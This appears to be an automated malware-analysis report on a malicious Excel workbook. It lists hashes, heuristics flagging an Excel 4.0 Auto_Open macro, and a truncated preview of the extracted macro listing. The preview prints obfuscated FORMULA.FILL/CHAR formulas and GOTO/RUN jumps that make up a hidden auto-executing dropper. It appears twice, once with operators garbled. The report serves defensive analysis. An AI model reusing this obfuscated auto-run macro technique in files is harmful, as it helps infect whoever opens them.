Office (OLE) malware analysis — malicious · 6122aeebbbc5f4a0

MALICIOUS

Office (OLE)

172.5 KB Created: 2020-05-12 10:47:12 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 16c388704080c57bd97bf3c7d3e16e78 SHA-1: 2b4bc0ceb876cc831e17ac53c3ea1b1d80909177 SHA-256: 6122aeebbbc5f4a0788be1ea012fb437b11b300e5756facdb0056c6cbfeba56f

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 128795 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	128795 bytes
SHA-256: `8bcb3d46d29de45fc1e9c99519ebd5651be4ae269ca1011c7762be4dfb72d7b1`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!FU17569 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,FD34,"",119.00000000000000000000 ' Sheet,DQ99,"",2.39318181818181807685 ' Sheet,ER111,"",1604.00000000000000000000 ' Sheet,FT130,"FORMULA.FILL(CHAR(J5365-FM25504)&CHAR(EM15064/BT63546)&CHAR(EM15064-BM38281)&CHAR(IN47414-FA44074)&CHAR(EM15064JE400)&CHAR(DZ54179+DG56025)&CHAR(J5365+E4748)&CHAR(BC31015JH13340)&CHAR(EM15064HW42512)&CHAR(DZ54179-BX26715)&CHAR(DZ54179IJ22592)&CHAR(HR13154EX3960)&CHAR(HR13154/Y54760)&CHAR(IN47414-IW29539)&CHAR(I18126+DI10168)&CHAR(DT54637/CP37852)&CHAR(IN47414/HM37500)&CHAR(BC31015-CZ11772)&CHAR(DT54637-BV53450)&CHAR(I18126+DD65032)&CHAR(IN47414+BT12882)&CHAR(J5365+DF9319)&CHAR(I18126/JH47270)&CHAR(EM15064E35168)&CHAR(DZ54179-GC39416)&CHAR(BC31015+M31266)&CHAR(I18126+S62960)&CHAR(DT54637-IF62454),BK48770)","" ' Sheet,FT131,GOTO(GH11480),"" ' Sheet,EB140,"",189.00000000000000000000 ' Sheet,DW171,"",-52.00000000000000000000 ' Sheet,CJ181,"",3.06000244140625010658 ' Sheet,CM223,"",-142.00000000000000000000 ' Sheet,CK249,"",-310.00000000000000000000 ' Sheet,CN249,"",0.85106382978723404964 ' Sheet,GD307,"",-1.66666666666666674068 ' Sheet,V394,"",61.00000000000000000000 ' Sheet,JE400,"",-0.65714285714285713969 ' Sheet,CW508,"",-191.00000000000000000000 ' Sheet,GN510,"",-12.58181818181818201197 ' Sheet,E539,"",198.00000000000000000000 ' Sheet,EI562,"",141.00000000000000000000 ' Sheet,CE606,"",-57.30003906249999801048 ' Sheet,IZ613,"FORMULA.FILL(CHAR(JI51750/HK11306)&CHAR(JI51750/JF28371)&CHAR(DF7470-BL16140)&CHAR(JI51750+E539)&CHAR(JG22931+HG59565)&CHAR(GT44792JH25615)&CHAR(CT26842/IQ18029)&CHAR(BU19673-II6519)&CHAR(DF7470+DP52606)&CHAR(DF7470GI32850)&CHAR(CT26842+EH62305)&CHAR(JT53499BA63399)&CHAR(JT53499/ID19147)&CHAR(JI51750+N35878)&CHAR(GT44792+FU36970)&CHAR(JG22931+EC14827)&CHAR(BU19673+GT62282)&CHAR(HU9445-DT25118)&CHAR(HQ2557S38104)&CHAR(G21468-GE46446)&CHAR(JI51750HH1434)&CHAR(JI51750-O26757)&CHAR(JI51750JG4859)&CHAR(GT44792+Z27816)&CHAR(CT26842+HD36964)&CHAR(DF7470FG25656)&CHAR(JT53499/FR30347)&CHAR(G21468-FK49264)&CHAR(G21468+FO26591)&CHAR(BU19673DU52696)&CHAR(BU19673+FS19972)&CHAR(CT26842-FE1526),GE32013)","" ' Sheet,IZ614,RUN(ED6020),"" ' Sheet,BY631,"",-0.03468308092485548888 ' Sheet,EB718,"",-476.00000000000000000000 ' Sheet,DS774,"",-12.69724770642201860937 ' Sheet,CD802,"",-70.00000000000000000000 ' Sheet,DU988,"",1432.00000000000000000000 ' Sheet,HK990,"",-330.00000000000000000000 ' Sheet,EE1008,"",-3.26086956521739113057 ' Sheet,CQ1032,"",-34.37500000000000000000 ' Sheet,DU1055,"",152.50000000000000000000 ' Sheet,FV1070,"",445.00000000000000000000 ' Sheet,IF1099,"",-0.11500007629394531916 ' Sheet,HY1305,"",334.00000000000000000000 ' Sheet,GP1349,"",0.06060606060606060774 ' Sheet,DX1350,"",0.95727272727272727515 ' Sheet,JD1397,"",191.00000000000000000000 ' Sheet,J1399,"",1.54936708860759497774 ' Sheet,JK1419,"",-452.00000000000000000000 ' Sheet,C1429,"",108.00000000000000000000 ' Sheet,GP1431,"",-13.00000000000000000000 ' Sheet,HH1434,"",-0.78571428571428569843 ' Sheet,BP1441,"",2.40298507462686572467 ' Sheet,GE1444,"",0.47204968944099379158 ' Sheet,M1462,"",1.19148936170212760288 ' Sheet,IM1495,"",-447.00000000000000000000 ' Sheet,CP1502,"",-117.00000000000000000000 ' Sheet,FE1526,"",-386.00000000000000000000 ' Sheet,IO1538,"",-144.00000000000000000000 ' Sheet,IO1558,"",-0.06719653179190751557 ' Sheet,GT1559,"",-0.36363636363636364646 ' Sheet,FI1582,"",0.46534653465346537127 ' Sheet,GC1617,"",0.56626506024096390224 ' Sheet,IU1629,"",5.58823529411764674535 ' Sheet,EN1688,"",144.00000000000000000000 ' Sheet,HY1735,"",-2.745098039 ... (truncated)

SHA-256: 8bcb3d46d29de45fc1e9c99519ebd5651be4ae269ca1011c7762be4dfb72d7b1

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!FU17569 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,FD34,"",119.00000000000000000000
'  Sheet,DQ99,"",2.39318181818181807685
'  Sheet,ER111,"",1604.00000000000000000000
'  Sheet,FT130,"FORMULA.FILL(CHAR(J5365-FM25504)&CHAR(EM15064/BT63546)&CHAR(EM15064-BM38281)&CHAR(IN47414-FA44074)&CHAR(EM15064*JE400)&CHAR(DZ54179+DG56025)&CHAR(J5365+E4748)&CHAR(BC31015*JH13340)&CHAR(EM15064*HW42512)&CHAR(DZ54179-BX26715)&CHAR(DZ54179*IJ22592)&CHAR(HR13154*EX3960)&CHAR(HR13154/Y54760)&CHAR(IN47414-IW29539)&CHAR(I18126+DI10168)&CHAR(DT54637/CP37852)&CHAR(IN47414/HM37500)&CHAR(BC31015-CZ11772)&CHAR(DT54637-BV53450)&CHAR(I18126+DD65032)&CHAR(IN47414+BT12882)&CHAR(J5365+DF9319)&CHAR(I18126/JH47270)&CHAR(EM15064*E35168)&CHAR(DZ54179-GC39416)&CHAR(BC31015+M31266)&CHAR(I18126+S62960)&CHAR(DT54637-IF62454),BK48770)",""
'  Sheet,FT131,GOTO(GH11480),""
'  Sheet,EB140,"",189.00000000000000000000
'  Sheet,DW171,"",-52.00000000000000000000
'  Sheet,CJ181,"",3.06000244140625010658
'  Sheet,CM223,"",-142.00000000000000000000
'  Sheet,CK249,"",-310.00000000000000000000
'  Sheet,CN249,"",0.85106382978723404964
'  Sheet,GD307,"",-1.66666666666666674068
'  Sheet,V394,"",61.00000000000000000000
'  Sheet,JE400,"",-0.65714285714285713969
'  Sheet,CW508,"",-191.00000000000000000000
'  Sheet,GN510,"",-12.58181818181818201197
'  Sheet,E539,"",198.00000000000000000000
'  Sheet,EI562,"",141.00000000000000000000
'  Sheet,CE606,"",-57.30003906249999801048
'  Sheet,IZ613,"FORMULA.FILL(CHAR(JI51750/HK11306)&CHAR(JI51750/JF28371)&CHAR(DF7470-BL16140)&CHAR(JI51750+E539)&CHAR(JG22931+HG59565)&CHAR(GT44792*JH25615)&CHAR(CT26842/IQ18029)&CHAR(BU19673-II6519)&CHAR(DF7470+DP52606)&CHAR(DF7470*GI32850)&CHAR(CT26842+EH62305)&CHAR(JT53499*BA63399)&CHAR(JT53499/ID19147)&CHAR(JI51750+N35878)&CHAR(GT44792+FU36970)&CHAR(JG22931+EC14827)&CHAR(BU19673+GT62282)&CHAR(HU9445-DT25118)&CHAR(HQ2557*S38104)&CHAR(G21468-GE46446)&CHAR(JI51750*HH1434)&CHAR(JI51750-O26757)&CHAR(JI51750*JG4859)&CHAR(GT44792+Z27816)&CHAR(CT26842+HD36964)&CHAR(DF7470*FG25656)&CHAR(JT53499/FR30347)&CHAR(G21468-FK49264)&CHAR(G21468+FO26591)&CHAR(BU19673*DU52696)&CHAR(BU19673+FS19972)&CHAR(CT26842-FE1526),GE32013)",""
'  Sheet,IZ614,RUN(ED6020),""
'  Sheet,BY631,"",-0.03468308092485548888
'  Sheet,EB718,"",-476.00000000000000000000
'  Sheet,DS774,"",-12.69724770642201860937
'  Sheet,CD802,"",-70.00000000000000000000
'  Sheet,DU988,"",1432.00000000000000000000
'  Sheet,HK990,"",-330.00000000000000000000
'  Sheet,EE1008,"",-3.26086956521739113057
'  Sheet,CQ1032,"",-34.37500000000000000000
'  Sheet,DU1055,"",152.50000000000000000000
'  Sheet,FV1070,"",445.00000000000000000000
'  Sheet,IF1099,"",-0.11500007629394531916
'  Sheet,HY1305,"",334.00000000000000000000
'  Sheet,GP1349,"",0.06060606060606060774
'  Sheet,DX1350,"",0.95727272727272727515
'  Sheet,JD1397,"",191.00000000000000000000
'  Sheet,J1399,"",1.54936708860759497774
'  Sheet,JK1419,"",-452.00000000000000000000
'  Sheet,C1429,"",108.00000000000000000000
'  Sheet,GP1431,"",-13.00000000000000000000
'  Sheet,HH1434,"",-0.78571428571428569843
'  Sheet,BP1441,"",2.40298507462686572467
'  Sheet,GE1444,"",0.47204968944099379158
'  Sheet,M1462,"",1.19148936170212760288
'  Sheet,IM1495,"",-447.00000000000000000000
'  Sheet,CP1502,"",-117.00000000000000000000
'  Sheet,FE1526,"",-386.00000000000000000000
'  Sheet,IO1538,"",-144.00000000000000000000
'  Sheet,IO1558,"",-0.06719653179190751557
'  Sheet,GT1559,"",-0.36363636363636364646
'  Sheet,FI1582,"",0.46534653465346537127
'  Sheet,GC1617,"",0.56626506024096390224
'  Sheet,IU1629,"",5.58823529411764674535
'  Sheet,EN1688,"",144.00000000000000000000
'  Sheet,HY1735,"",-2.745098039
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.